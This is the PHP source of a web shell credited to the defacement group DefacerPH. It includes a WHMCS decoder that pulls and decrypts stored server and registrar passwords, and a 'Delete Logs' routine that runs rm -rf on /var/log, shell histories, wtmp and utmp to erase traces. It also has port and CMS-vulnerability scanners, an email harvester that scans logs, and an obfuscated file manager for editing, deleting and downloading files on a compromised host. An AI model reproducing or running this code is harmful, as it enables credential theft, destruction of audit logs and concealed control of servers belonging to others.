<table class=tabnet style=width:320px;padding:0 1px;>
<tr><th colspan=2>WHMCS Decoder</th></tr>
<tr><td>db_host </td><td><input  type='text' style='color:#000;background-color:' class='form-control' size='38' name='db_host' value='localhost'></td></tr>
<tr><td>db_username </td><td><input type='text' style='color:#000;background-color:' class='form-control' size='38' name='db_username' value=''></td></tr>
<tr><td>db_password</td><td><input type='text' style='color:#000;background-color:' class='form-control' size='38' name='db_password' value=''></td></tr>
<tr><td>db_name</td><td><input type='text' style='color:#000;background-color:' class='form-control' size='38' name='db_name' value=''></td></tr>
<tr><td>cc_encryption_hash</td><td><input style='color:#000;background-color:' type='text' class='form-control' size='38' name='cc_encryption_hash' value=''></td></tr>
<td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='form-control' type='submit' style='color:#000;background-color:'  value='Submit' name='Submit'></td>

    if ($_POST['form_action'] == 2)
        $db_host = ($_POST['db_host']);
        $db_username = ($_POST['db_username']);
        $db_password = ($_POST['db_password']);
        $db_name = ($_POST['db_name']);
        $cc_encryption_hash = ($_POST['cc_encryption_hash']);

        $link = mysql_connect($db_host, $db_username, $db_password);
        mysql_select_db($db_name, $link);
        $query = mysql_query("SELECT * FROM tblservers");
        while ($v = mysql_fetch_array($query))
            $ipaddress = $v['ipaddress'];
            $username = $v['username'];
            $type = $v['type'];
            $active = $v['active'];
            $hostname = $v['hostname'];
            echo ("<center><table border='1'>");
            $password = decrypt($v['password'], $cc_encryption_hash);
            echo ("<tr><td>Type</td><td>$type</td></tr>");
            echo ("<tr><td>Active</td><td>$active</td></tr>");
            echo ("<tr><td>Hostname</td><td>$hostname</td></tr>");
            echo ("<tr><td>Ip</td><td>$ipaddress</td></tr>");
            echo ("<tr><td>Username</td><td>$username</td></tr>");
            echo ("<tr><td>Password</td><td>$password</td></tr>");

            echo "</table><br><br></center>";

        $link = mysql_connect($db_host, $db_username, $db_password);
        mysql_select_db($db_name, $link);
        $query = mysql_query("SELECT * FROM tblregistrars");
        echo ("<center>Domain Reseller <br><table class=tabnet border='1'>");
        echo ("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
        while ($v = mysql_fetch_array($query))
            $registrar = $v['registrar'];
            $setting = $v['setting'];
            $value = decrypt($v['value'], $cc_encryption_hash);
            if ($value == "")
                $value = 0;
            $password = decrypt($v['password'], $cc_encryption_hash);
            echo ("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
elseif (isset($_GET[hex('delete-logs') ]))

    echo '<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>';
    echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";
    exec("rm -rf /tmp/logs");
    exec("rm -rf /root/.ksh_history");
    exec("rm -rf /root/.bash_history");
    exec("rm -rf /root/.bash_logout");
    exec("rm -rf /usr/local/apache/logs");
    exec("rm -rf /usr/local/apache/log");
    exec("rm -rf /var/apache/logs");
    exec("rm -rf /var/apache/log");
    exec("rm -rf /var/run/utmp");
    exec("rm -rf /var/logs");
    exec("rm -rf /var/log");
    exec("rm -rf /var/adm");
    exec("rm -rf /etc/wtmp");
    exec("rm -rf /etc/utmp");
    exec("rm -rf $HISTFILE");
    exec("rm -rf /var/log/lastlog");
    exec("rm -rf /var/log/wtmp");

    shell_exec("rm -rf /tmp/logs");
    shell_exec("rm -rf /root/.ksh_history");
    shell_exec("rm -rf /root/.bash_history");
    shell_exec("rm -rf /root/.bash_logout");
    shell_exec("rm -rf /usr/local/apache/logs");
    shell_exec("rm -rf /usr/local/apache/log");
    shell_exec("rm -rf /var/apache/logs");
    shell_exec("rm -rf /var/apache/log");
    shell_exec("rm -rf /var/run/utmp");
    shell_exec("rm -rf /var/logs");
    shell_exec("rm -rf /var/log");
    shell_exec("rm -rf /var/adm");
    shell_exec("rm -rf /etc/wtmp");
    shell_exec("rm -rf /etc/utmp");
    shell_exec("rm -rf $HISTFILE");
    shell_exec("rm -rf /var/log/lastlog");
    shell_exec("rm -rf /var/log/wtmp");

    passthru("rm -rf /tmp/logs");
    passthru("rm -rf /root/.ksh_history");
    passthru("rm -rf /root/.bash_history");
    passthru("rm -rf /root/.bash_logout");
    passthru("rm -rf /usr/local/apache/logs");
    passthru("rm -rf /usr/local/apache/log");
    passthru("rm -rf /var/apache/logs");
    passthru("rm -rf /var/apache/log");
    passthru("rm -rf /var/run/utmp");
    passthru("rm -rf /var/logs");
    passthru("rm -rf /var/log");
    passthru("rm -rf /var/adm");
    passthru("rm -rf /etc/wtmp");
    passthru("rm -rf /etc/utmp");
    passthru("rm -rf $HISTFILE");
    passthru("rm -rf /var/log/lastlog");
    passthru("rm -rf /var/log/wtmp");

    system("rm -rf /tmp/logs");
    echo '<br>Deleting .../tmp/logs ';

    system("rm -rf /root/.bash_history");
    echo '<p>Deleting .../root/.bash_history </p>';

    system("rm -rf /root/.ksh_history");
    echo '<p>Deleting .../root/.ksh_history </p>';

    system("rm -rf /root/.bash_logout");
    echo '<p>Deleting .../root/.bash_logout </p>';

    system("rm -rf /usr/local/apache/logs");
    echo '<p>Deleting .../usr/local/apache/logs </p>';

    system("rm -rf /usr/local/apache/log");
    echo '<p>Deleting .../usr/local/apache/log </p>';

    system("rm -rf /var/apache/logs");
    echo '<p>Deleting .../var/apache/logs </p>';

    system("rm -rf /var/apache/log");
    echo '<p>Deleting .../var/apache/log </p>';

    system("rm -rf /var/run/utmp");
    echo '<p>Deleting .../var/run/utmp </p>';

    system("rm -rf /var/logs");
    echo '<p>Deleting .../var/logs </p>';

    system("rm -rf /var/log");
    echo '<p>Deleting .../var/log </p>';

    system("rm -rf /var/adm");
    echo '<p>Deleting .../var/adm </p>';

    system("rm -rf /etc/wtmp");
    echo '<p>Deleting .../etc/wtmp </p>';

    system("rm -rf /etc/utmp");
    echo '<p>Deleting .../etc/utmp </p>';

    system("rm -rf $HISTFILE");
    echo '<p>Deleting ...$HISTFILE </p>';

    system("rm -rf /var/log/lastlog");
    echo '<p>Deleting .../var/log/lastlog </p>';

    system("rm -rf /var/log/wtmp");
    echo '<p>Deleting .../var/log/wtmp </p>';


    echo '<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server';
    echo "</td></tr></table>";
elseif (isset($_GET[hex('scanner') ]))
    echo "<hr><br>";
    echo "<center><h2>Scanner Shell</h2></center><br>";
    echo "<form method = 'POST'>
						<div class = 'row clearfix'>
						<div class = 'col-md-4'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('cmsvuln') . "' style='width: 250px;' height='10'><center>CMS Vulnerability Scanner</center></a>
						<div class = 'col-md-4'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('port-scanner') . "' style='width: 250px;' height='10'><center>Port Scanner</center></a>
						<div class = 'col-md-4'>
						<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex('logs-scanner') . "' style='width: 250px;' height='10'><center>Logs Scanner</center></a>
    echo "<hr>";
elseif (isset($_GET[hex('cmsvuln') ]))
    // Script Functions , start ..!
    function ask_exploit_db($component)
        $exploitdb = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
        $result = @file_get_contents($exploitdb);
        if (eregi("No results", $result))
            echo "<center><td>tidak ada</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
            echo "<td><a href='$exploitdb'>Klik Ini..!</a></td><td><--</td></tr>";
    /* Joomla Conf */
    function get_components($site)
        $source = @file_get_contents($site);
        preg_match_all('{option,(.*?)/}i', $source, $f);
        preg_match_all('{option=(.*?)(&amp;|&|")}i', $source, $f2);
        preg_match_all('{/components/(.*?)/}i', $source, $f3);
        $arz = array_merge($f2[1], $f[1], $f3[1]);
        $coms = array();
        if (count($arz) == 0)
            echo "<tr><td style='border-color:white' colspan=3>[~] Tidak ada ! Site Error atau Option salah :-</td></tr>";
        foreach (array_unique($arz) as $x)
            $coms[] = $x;
        foreach ($coms as $comm)
            echo "<tr><td>$comm</td>";
    /* WP Conf */
    function get_plugins($site)
        $source = @file_get_contents($site);
        preg_match_all("#/plugins/(.*?)/#i", $source, $f);
        $plugins = array_unique($f[1]);
        if (count($plugins) == 0)
            echo "<tr><td style='border-color:white' colspan=1>[~]  Tidak ada ! Site Error atau Option salah :-</td></tr>";
        foreach ($plugins as $plugin)
            echo "<tr><td>$plugin</td>";
    /* Nuke's Conf */
    function get_numod($site)
        $source = @file_get_contents($site);
        preg_match_all('{?name=(.*?)/}i', $source, $f);
        preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i', $source, $f2);
        preg_match_all('{/modules/(.*?)/}i', $source, $f3);
        $arz = array_merge($f2[1], $f[1], $f3[1]);
        $coms = array();
        if (count($arz) == 0)
            echo "<tr><td style='border-color:white' colspan=3>[~]  Tidak ada ! Site Error atau Option salah :-</td></tr>";
        foreach (array_unique($arz) as $x)
            $coms[] = $x;
        foreach ($coms as $nmod)
            echo "<tr><td>$nmod</td>";
    /* Xoops Conf */
    function get_xoomod($site)
        $source = @file_get_contents($site);
        preg_match_all('{/modules/(.*?)/}i', $source, $f);
        $arz = array_merge($f[1]);
        $coms = array();
        if (count($arz) == 0)
            echo "<tr><td style='border-color:white' colspan=3>[~]  Tidak ada ! Site Error atau Option salah :-</td></tr>";
        foreach (array_unique($arz) as $x)
            $coms[] = $x;
        foreach ($coms as $xmod)
            echo "<tr><td>$xmod</td>";
    /* Header */
    function t_header($site)
        echo '<br><hr color="white"><br><table align="center" border="1" style="border-color=white; text-align:left;" width="50%" cellspacing="1" cellpadding="5">';
        echo '
<td style="border-color=white">Site : <a href="' . $site . '">' . $site . '</a></td>
<td style="border-color=white">Exploit-db</b></td>
<td style="border-color=white">Exploit it !</td>
    echo "<center>";
    echo '<hr><br>
<h2>CMS Vulnerability Scanner Shell</h2>
<form method="POST" action=""  class="header-izz">
    <p>Link&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="site" value="" class = "form-control" >
    &nbsp&nbsp&nbsp<select class = "form-control"  name="pilihan" style="border:0;border-bottom:1px solid #292929; width:500px;">
    <input class = "form-control" type="submit" style="width: 150px; height: 40px; border-color=white;margin:10px 2px 0 2px;" value="Scan" class="kotak"></p>
    // Start Scan :P :P ...
    if ($_POST)
        $site = strip_tags(trim($_POST['site']));
        echo $x01 = ($_POST['pilihan'] == "Wordpress") ? get_plugins($site) : "";
        echo $x02 = ($_POST['pilihan'] == "Joomla") ? get_components($site) : "";
        echo $x03 = ($_POST['pilihan'] == "Nuke's") ? get_numod($site) : "";
        echo $x04 = ($_POST['pilihan'] == "Xoops") ? get_xoomod($site) : "";
elseif (isset($_GET[hex('port-scanner') ]))
    echo "<hr><br><center>";
    echo '<table><h2>Ports Scanner</h2><td>';
    echo '<div class="content">';
    echo '<form action="" method="post">';

    if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start']))
        $start = strip_tags($_POST['start']);
        $end = strip_tags($_POST['end']);
        $host = strip_tags($_POST['host']);
        for ($i = $start;$i <= $end;$i++)
            $fp = @fsockopen($host, $i, $errno, $errstr, 3);
            if ($fp)
                echo 'Port ' . $i . ' is <font color=green>open</font><br>';
        echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
		              <input type="hidden" name="c" value="' . htmlspecialchars($GLOBALS['cwd']) . '">
		              <input type="hidden" name="charset" value="' . (isset($_POST['charset']) ? $_POST['charset'] : '') . '">
		              Host:<br> <input class = "form-control" type="text" name="host" value="localhost"/><br /><br />
		              Port start: <br><input class = "form-control type="text" name="start" value="0"/><br /><br />
		              Port end: <br><input type="text" name="end" value="5000"/><br /><br />
		              <input class = "form-control type="submit" value="Scan Ports" />
		              </form></center><br /><br />';
        echo "</center>";
        echo '</div></table></td><hr><br>';
elseif (isset($_GET[hex('logs-scanner') ]))

    echo '<hr><br>';
    echo "<Center>\n";
    echo "<h2>Log Localhost Malaysia</h2>";
    echo "<form action=\"\" method=\"post\">\n";
?><br>Dir :<input class="form-control" style="width: 250px;" type="text" value="<?=getcwd(); ?>" name="shc_dir"><?php
    echo "<br>";
    echo "<input class = 'form-control' style='width:250px;' type=\"submit\" name=\"submit\" value=\"Scan Now!\"/>\n";
    echo "</form><hr><br>\n";
    echo "<pre style=\"text-align: left;\">\n";
    Name    : Log (Grab Email)
    Date    : 26/03/2016 05:53 PM
    Author  : Jaring

    if ($_POST['submit'])
        function tampilkan($shcdirs)
            foreach (scandir($shcdirs) as $shc)
                if ($shc != '.' && $shc != '..')
                    $shc = $shcdirs . DIRECTORY_SEPARATOR . $shc;
                    if (!is_dir($shc) && !eregi("css", $shc))

                        $fgt = file_get_contents($shc);
                        $ifgt = exif_read_data($shc);
                        $jembut = "COMPUTED";
                        $taik = "UserComment";
                        $shcm = "/mail['(']/";
                        if ($ifgt[$jembut][$taik])
                            echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>" . $shc . "</font><br>";
                        preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#', $fgt, $cocok);
                        $hcs = "/base64_decode/";
                        $exif = "/exif_read_data/";
                        preg_match($shcm, addslashes($fgt) , $mailshc);
                        preg_match($hcs, addslashes($fgt) , $shcmar);
                        preg_match($exif, addslashes($fgt) , $shcxif);
                        if (eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt))
                        if (eregi('tmp_name', $fgt))
                            echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>" . $shc . "</font><br>";
                        if ($shcmar[0])
                            echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>" . $shc . "</font><br>";
                        if ($mailshc[0])
                            echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>" . $shc . "</font><br>";
                        if ($shcxif[0])
                            echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>" . $shc . "</font> </font><font color=red>{Manual Check}</font><br>";
                        if (eregi("js", $shc))
                            echo "[<font color=red>Javascript</font>] <font color=#2196F3>" . $shc . "</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
                        if ($cocok[0])
                            foreach ($cocok[0] as $key => $shcmail)
                                if (filter_var($shcmail, FILTER_VALIDATE_EMAIL))
                                    echo "[<font color=greenyellow>SendMail</font>] <font color=#2196F3>" . $shc . "</font> { " . $shcmail . " }<br>";
    echo "</pre>\n";
    echo "</Center>\n";
    echo "</div>";
elseif (isset($_GET[hex('about') ]))

    echo "<hr><br><center><h2>About DefacerPH</h2>";
    echo "Thanks For Taking Our Shell Today without you all we are means nothing :) <br><br>";
    echo "visit us : <a href = 'https://defacerph.neocities.org' target = 'blank' class= 'form-control' style = 'width:250px;'>Pawned!</a> <br><br>";
    echo "We Are : <br>
			    [ DefacerPH | 2008 ]<br><br>[ R1Z4L | N16H7 CR4WL3R | K1LL3RB4LL | Alex | ph.M1k3y | Cyb3rFr0st | Haxcoder | MR.$UD0 | xZyle | L4ZYG33K | 0xJoshua ]<br>
    echo "Greetz : <br>";
    echo "<hr><br></center>";
elseif (isset($_GET[hex('killself') ]))
    unset($_SESSION[md5($_SERVER['HTTP_HOST']) ]);
    print "<script>window.location='?';</script>";
elseif (isset($_GET[hex('logout') ]))
    unset($_SESSION[md5($_SERVER['HTTP_HOST']) ]);
    print "<script>window.location='?';</script>";
elseif (isset($_GET["n"]))
    echo $a_ . '+FILE' . $b_ . '
									<form action="" method="post">
										<input name="n" autocomplete="off" class="form-control col-md-3" type="text" value="">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["n"]))
        if (!$GNJ[25]($_POST["n"]))
elseif (isset($_GET["r"]))
    echo $a_ . uhex($_GET["r"]) . $b_ . '
									<form action="" method="post">
										<input name="r" autocomplete="off" class="form-control col-md-3" type="text" value="' . uhex($_GET["r"]) . '">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["r"]))
        if ($GNJ[26]($_POST["r"]))
            if ($GNJ[27](uhex($_GET["r"]) , $_POST["r"]))
elseif (isset($_GET["z"]))
    $zip = new ZipArchive;
    $res = $zip->open(uhex($_GET["z"]));
    if ($res === true)

    echo '<table class = "table table-bordered mt-3" >
								<th><center> NAME </center></th>
								<th><center> TYPE </center></th>
								<th><center> SIZE </center></th>
								<th><center> LAST MODIFIED </center></th>
								<th><center> OWNER\GROUP </center></th>
								<th><center> PERMISSION </center></th>
								<th><center> ACTION </center></th>

    $h = "";
    $j = "";
    $w = $GNJ[13]($d);
    if ($GNJ[28]($w) || $GNJ[29]($w))
        foreach ($w as $c)
            $e = $GNJ[14]("\\", "/", $d);
            if (!$GNJ[30]($c, ".zip"))
                $zi = '';
                $zi = '<a href="?d=' . hex($e) . '&z=' . hex($c) . '">U</a>';
            if ($GNJ[31]("$d/$c"))
                $o = "";
            elseif (!$GNJ[32]("$d/$c"))
                $o = " h";
                $o = " w";
            $s = $GNJ[34]("$d/$c") / 1024;
            $s = round($s, 3);
            if ($s >= 1024)
                $s = round($s / 1024, 2) . " MB";
                $s = $s . " KB";
            if (($c != ".") && ($c != ".."))
                ($GNJ[8]("$d/$c")) ? $h .= '<tr class="r">
								<img src = "https://defacerph.neocities.org/assets/img/logo.png" width = "20px" height = "20px">
								<a class="ajx" href="?d=' . hex($e) . hex("/" . $c) . '">' . $c . '</a>
							<td class="x">
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("F d Y g:i:s", $GNJ[21]("$d/$c")) . '</a>
							<td class = "x">
							' . $dirinfo["owner"] . DIRECTORY_SEPARATOR . $dirinfo["group"] . '
							<td class="x">
								<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("$d/$c") . '</a>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">Rename</a>
								<a class="ajx" href="?d=' . hex($e) . '&x=' . hex($c) . '">Delete</a>
						' : $j .= '<tr class="r">
								<img src = "https://defacerph.neocities.org/assets/img/logo.png" width = "29px" height = "20px">
								<a class="ajx" href="?d=' . hex($e) . '&s=' . hex($c) . '">' . $c . '</a>
							<td class="x">
								' . $s . '
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("F d Y g:i:s", $GNJ[21]("$d/$c")) . '</a>
							' . $dirinfo["owner"] . DIRECTORY_SEPARATOR . $dirinfo["group"] . '
								<td class="x">
							<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("$d/$c") . '</a>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&e=' . hex($c) . '">Edit</a>
								<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">Rename</a>
								<a href="?d=' . hex($e) . '&g=' . hex($c) . '">Download</a>
								' . $zi . '
								<a class="ajx" href="?d=' . hex($e) . '&x=' . hex($c) . '">Delete</a>

    echo $h;
    echo $j;
    echo '</tbody>

				<footer class="x">
					<center>@Re-Code By MR.$UD0 ~ DefacerPH </center>
if (isset($_GET["1"]))
    echo $f;
elseif (isset($_GET["0"]))
    echo $g;
					$(".ajx").click(function(t) {
						var e = $(this).attr("href");
						history.pushState("", "", e), $.get(e, function(t) {

function rec($j)
    global $GNJ;
    if (trim(pathinfo($j, PATHINFO_BASENAME) , '.') === '')
    if ($GNJ[8]($j))
        array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
function dre($y1, $y2)
    global $GNJ;
    return $GNJ[36]();
function hex($n)
    $y = '';
    for ($i = 0;$i < strlen($n);$i++)
        $y .= dechex(ord($n[$i]));
    return $y;
function uhex($y)
    $n = '';
    for ($i = 0;$i < strlen($y) - 1;$i += 2)
        $n .= chr(hexdec($y[$i] . $y[$i + 1]));
    return $n;
function OK()
    global $GNJ, $d;
    header("Location: ?d=" . hex($d) . "&1");
function ER()
    global $GNJ, $d;
    header("Location: ?d=" . hex($d) . "&0");
function x($c)
    global $GNJ;
    $x = $GNJ[24]($c);
    if (($x & 0xC000) == 0xC000)
        $u = "s";
    elseif (($x & 0xA000) == 0xA000)
        $u = "l";
    elseif (($x & 0x8000) == 0x8000)
        $u = "-";
    elseif (($x & 0x6000) == 0x6000)
        $u = "b";
    elseif (($x & 0x4000) == 0x4000)
        $u = "d";
    elseif (($x & 0x2000) == 0x2000)
        $u = "c";
    elseif (($x & 0x1000) == 0x1000)
        $u = "p";
        $u = "u";
    $u .= (($x & 0x0100) ? "r" : "-");
    $u .= (($x & 0x0080) ? "w" : "-");
    $u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-"));
    $u .= (($x & 0x0020) ? "r" : "-");
    $u .= (($x & 0x0010) ? "w" : "-");
    $u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-"));
    $u .= (($x & 0x0004) ? "r" : "-");
    $u .= (($x & 0x0002) ? "w" : "-");
    $u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-"));
    return $u;
if (isset($_GET["g"]))
    header("Content-Type: application/octet-stream");
    header("Content-Transfer-Encoding: Binary");
    header("Content-Length: " . $GNJ[34](uhex($_GET["g"])));
    header("Content-disposition: attachment; filename=\"" . uhex($_GET["g"]) . "\"");